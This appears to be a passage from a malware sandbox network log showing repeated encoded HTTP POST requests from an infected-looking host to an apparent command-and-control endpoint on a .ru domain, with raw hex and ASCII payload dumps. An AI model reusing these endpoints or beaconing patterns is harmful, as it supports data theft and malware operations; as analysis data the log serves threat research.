                                                                                          Data Ascii: TZ^PU^_Q\[RXWXX\XPZYRSQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*:,4;)Q%# *?%Z!.!'>+R -:(,+5;Z#.9>!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:24.342242002 CET   25   IN   HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:24.603180885 CET   803   IN   HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:24 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lldxRD84KBPBu7qqe4cK6EmQ5HITGVDfth3JFu3QxFbH%2FzBr0VYwO4MpXCgMOQtPXR9TvIjpXD763rPwwz5SID4k0uV%2BN7gez0rnagQlS6B9GUgyz7xfUNeLls6Hl6tv87tjTKyt"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ecedc2242e6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8453&min_rtt=1763&rtt_var=14042&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=26406&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                          134          192.168.2.4   50142         104.21.38.84     80
                                                                                          Timestamp   Bytes transferred   Direction   Data
                                                                                          Jan 4, 2025 11:09:24.741554976 CET   317   OUT   POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:25.092591047 CET   2520   OUT   Data Raw: 54 5c 5b 57 55 5d 5a 57 5c 5b 52 58 57 5b 58 5d 58 51 5a 5a 52 54 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\[WU]ZW\[RXW[X]XQZZRTQX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=*?7+9Q&U(>?&!=0=$#&W('+[4>9>+!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:25.186860085 CET   25   IN   HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:25.442658901 CET   806   IN   HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:25 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLQ6svXQdiHgXQM4K97tJ8wXg%2BaP5nBPfaT1TJjz%2FyxcMPp4kwugiPxG5ZZSfoWcKZHJQxQ3u3OcIaWmXF0ME1Q9k9bAncAq2lMm%2FSCTjX2k8RwfBQ50cBg%2BDnblNd1Du9CFGOyR"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ed42f230fa8-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4111&min_rtt=1544&rtt_var=5713&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=66114&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                          135          192.168.2.4   50143         104.21.38.84     80
                                                                                          Timestamp   Bytes transferred   Direction   Data
                                                                                          Jan 4, 2025 11:09:25.566207886 CET   317   OUT   POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:25.920649052 CET   2520   OUT   Data Raw: 51 5a 5b 57 55 5c 5a 5c 5c 5b 52 58 57 5c 58 53 58 55 5a 53 52 53 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[WU\Z\\[RXW\XSXUZSRSQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)( (%(=/9!90X#Q4>+,3_?%#">:^*!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:26.034452915 CET   25   IN   HTTP/1.1 100 Continue


                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                          136          192.168.2.4   50144         104.21.38.84     80
                                                                                          Timestamp   Bytes transferred   Direction   Data
                                                                                          Jan 4, 2025 11:09:26.098488092 CET   317   OUT   POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:26.455554008 CET   1844   OUT   Data Raw: 51 5c 5e 57 55 58 5f 51 5c 5b 52 58 57 58 58 52 58 52 5a 53 52 5d 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^WUX_Q\[RXWXXRXRZSR]QY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*9?C"851(=,)5%X3-44>S+0(6?72^=;!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:26.561803102 CET   25   IN   HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:26.836464882 CET   951   IN   HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:26 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o3ywnauXhPeN6utEwLFmgYABnFaVKnglOgGKWAkZF8dmZdYCz1BDlZd2Vt5nxv0bbPImTHv9aap0irtklh4aRqMUcnDYNbd%2BoGQvHcK4U0Kk7p983EjcNWXo%2FbEP4RdgXE1Sk4vL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6edcbceb7288-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4998&min_rtt=1944&rtt_var=6837&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=55351&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 2b 10 0e 1d 22 01 0d 00 29 2e 2e 5f 25 33 3f 07 2c 32 27 5f 23 5a 27 12 2c 0c 29 5b 27 0d 01 01 3d 01 28 1d 37 09 33 54 27 0a 2a 5d 06 12 38 12 28 02 3a 10 25 02 32 54 2a 0b 31 1d 26 26 3d 07 30 3e 2b 1e 3c 02 3d 14 32 5a 35 1d 2a 06 2d 06 3a 2a 0e 40 2c 5a 34 57 22 03 21 53 08 13 20 13 26 0f 09 57 29 30 13 5a 25 23 18 04 27 04 23 55 2a 16 2f 09 25 3d 2e 17 2c 22 27 1e 3c 0a 27 03 2e 3e 0d 07 2b 07 3c 0d 24 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+").._%3?,2'_#Z',)['=(73T'*]8(:%2T*1&&=0>+<=2Z5*-:*@,Z4W"!S &W)0Z%#'#U*/%=.,"'<'.>+<$,"\ #V=WL0


                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                          137          192.168.2.4   50145         104.21.38.84     80
                                                                                          Timestamp   Bytes transferred   Direction   Data
                                                                                          Jan 4, 2025 11:09:26.218240023 CET   317   OUT   POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:26.579560041 CET   2516   OUT   Data Raw: 51 59 5e 5f 55 52 5a 56 5c 5b 52 58 57 5a 58 5f 58 54 5a 59 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^_URZV\[RXWZX_XTZYRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)*<4;&&;X>Z)![*0> #*),*&8 =&[)+!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:26.685051918 CET   25   IN   HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:26.956968069 CET   815   IN   HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:26 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQfOhfjAAatlp0CYM5Tt1JCaDF6%2BlDAovTjgOlC%2BFX3MBHY0qV%2BtrXY%2Fh25aTDsI5qHZQhaW0nXow8xwEBpkGid03bedAEBzu72CvMpdzoh%2BgF%2F7kJa8shkK8LOrt%2BAXDPzI9dG%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6edd7e920fa4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2941&min_rtt=1561&rtt_var=3346&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=115845&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                          138          192.168.2.4   50146         104.21.38.84     80
                                                                                          Timestamp   Bytes transferred   Direction   Data
                                                                                          Jan 4, 2025 11:09:27.083452940 CET   293   OUT   POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:27.436322927 CET   2520   OUT   Data Raw: 51 59 5e 53 50 5e 5a 56 5c 5b 52 58 57 52 58 5d 58 57 5a 53 52 57 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^SP^ZV\[RXWRX]XWZSRWQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.))785%4=?5Y!-*376R+0(&' &_>;!Y#!Y,
                                                                                          Jan 4, 2025 11:09:27.537556887 CET   25   IN   HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:27.712111950 CET   806   IN   HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:27 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCIuI1OzCDi1Ui%2FpMMJd5TDaXpyhPl8pS0fwMRz1YOLcCKuKn9m2%2B0LB2I7GIwY8lAUVzmthiB%2B74mU8SIw1C%2FTN2QJ3N49gX1IFuCgwokuUhczTaPr86kN3h9Z62KBT1bLOvGSB"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ee2da20c425-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3431&min_rtt=1481&rtt_var=4456&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=85455&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                          139          192.168.2.4   50147         104.21.38.84     80
                                                                                          Timestamp   Bytes transferred   Direction   Data
                                                                                          Jan 4, 2025 11:09:27.851675987 CET   317   OUT   POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:28.201920033 CET  2520  OUT  Data Raw: 54 5d 5b 54 50 5b 5a 57 5c 5b 52 58 57 5f 58 5f 58 5c 5a 5c 52 51 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T][TP[ZW\[RXW_X_X\Z\RQQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=4#+"'#'\*?2!%Y377>!+/0(<4[.)+!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:28.304510117 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:28.561491966 CET  806  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dcVje%2Bi5MoF66dujfTB5U4aVfXNjCnE31%2BlNGlKd8hWXRYi5uqxji1Za%2BTvM8pwY3Xra2gy%2BhpYruhENGCsseZtQQK7d3lJNgWT7A4v7QgI9z46zjoErhwgIIIpW6ghMrNbN6vWK"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ee79f4272b9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3690&min_rtt=1919&rtt_var=4263&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=90722&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          140         192.168.2.4  50148        104.21.38.84    80
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:28.690932035 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:29.045684099 CET  2520  OUT  Data Raw: 51 5a 5e 57 55 5a 5a 54 5c 5b 52 58 57 5d 58 52 58 52 5a 5f 52 52 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^WUZZT\[RXW]XRXRZ_RRQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@(*048Q2 8)<:51\$>;Q#=<,/\*& 7=-*+!Y#!Y,
                                                                                          Jan 4, 2025 11:09:29.135080099 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:29.360640049 CET  811  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:29 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fI2t1GiBlV%2F4KINejx%2FVdYcGKk7NHVXOcB4NT%2BTHTX5%2FZKwZLLKYmS7tcg4q1GNEr1cMxDYuInesVFrjvxyLSgteRkqkD86Ql9uHD5mgLt4uBIsdaVMVVZqW%2BSN%2BG3s8fY2d6Ke7"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6eecd83e5e78-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1667&rtt_var=1208&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=365091&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          141         192.168.2.4  50149        104.21.38.84    80
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:29.488266945 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:29.842552900 CET  2520  OUT  Data Raw: 54 5b 5e 5e 55 5e 5a 56 5c 5b 52 58 57 5b 58 5a 58 50 5a 52 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^^U^ZV\[RXW[XZXPZRRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=*3@ &%3#\(<16=:&-<!.R(*%<#-&X*!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:29.938638926 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:30.199486017 CET  806  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EVd%2B2RGlJcWVFVLkWismiNhG7EcjDpDZB3ZpX%2BS6CYtXQ3sfLt9aDGZxUucvtPVKwZl%2BkWyIDDJ09fNMH8JqQ3uDGPZvZEBZ5C1rdP3OxzfD%2BYDxn5HqKLAtFHeegrdV8nydY0n"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ef1daf88cb1-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4331&min_rtt=1962&rtt_var=5475&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=69786&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          142         192.168.2.4  50150        104.21.38.84    80
                                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:30.328701019 CET  317  OUT  POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:30.687578917 CET  2516  OUT  Data Raw: 54 59 5e 52 50 5c 5a 50 5c 5b 52 58 57 5a 58 5c 58 54 5a 5b 52 50 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^RP\ZP\[RXWZX\XTZ[RPQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C>:/C7P&#*?.6.%[3=< >"?3^<&'7.&=!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:30.793955088 CET  25  IN  HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:30.971450090 CET  813  IN  HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9n1DDLiBTo%2FaPQ6W%2Fe7YHoN%2FJ91IYuPeCz8Pw4YfNmP5BKDgZihc9ukMfxM%2BHm8QcGZ2HlFXuD5BzA%2FTRxz9TyCMFdSxnksagL9qnYnHRG3%2BizrtfDm5omQURu81x%2F4NTvFurHR"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ef72ea38cdc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3428&min_rtt=1979&rtt_var=3641&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=107550&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          143         192.168.2.4  50151        104.21.38.84    80
                                                                                          Timestamp  Bytes transferred  Direction  Data
